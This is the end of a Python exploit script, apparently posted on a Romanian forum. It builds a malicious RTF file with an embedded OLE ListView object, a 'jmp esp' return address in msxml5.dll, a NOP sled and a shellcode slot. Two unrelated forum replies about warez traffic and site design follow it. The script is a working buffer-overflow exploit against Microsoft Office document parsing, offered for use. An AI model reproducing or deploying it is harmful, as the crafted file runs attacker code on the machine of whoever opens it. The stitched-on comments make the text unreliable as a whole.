content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF" content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400" content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000" content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628" content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00" content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000" content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000" content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000" content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF" content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000" content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000" content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF" content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000" content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000" content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000" content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400" content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000" content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600" content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080" content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974" content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000" content+="000000000000" content+= 'cb818278'# Address=788281CB jmp esp | {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll) content+="9090909090909090" #nops content+= shellcode #junk content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000" content+="\n" content+="}" content+="}" content+="}" banner = "\n\n" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_|[] /_/ \_\_____|\n\n" print banner if(len(sys.argv) < 2): print '\n Usage : exploit.py filename.rtf' else: filename = sys.argv[1] f=open(filename,"w") f.write(content) f.close() print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'
  23. fa si o categorie de warez daca vrei trafic
  24. Daca nu il colorai asa de tare parca era mai ok, daca postezi lucruri de calitate toti isi vor face scrapere si le iau automat. p.s: Foloseste o platforma open source
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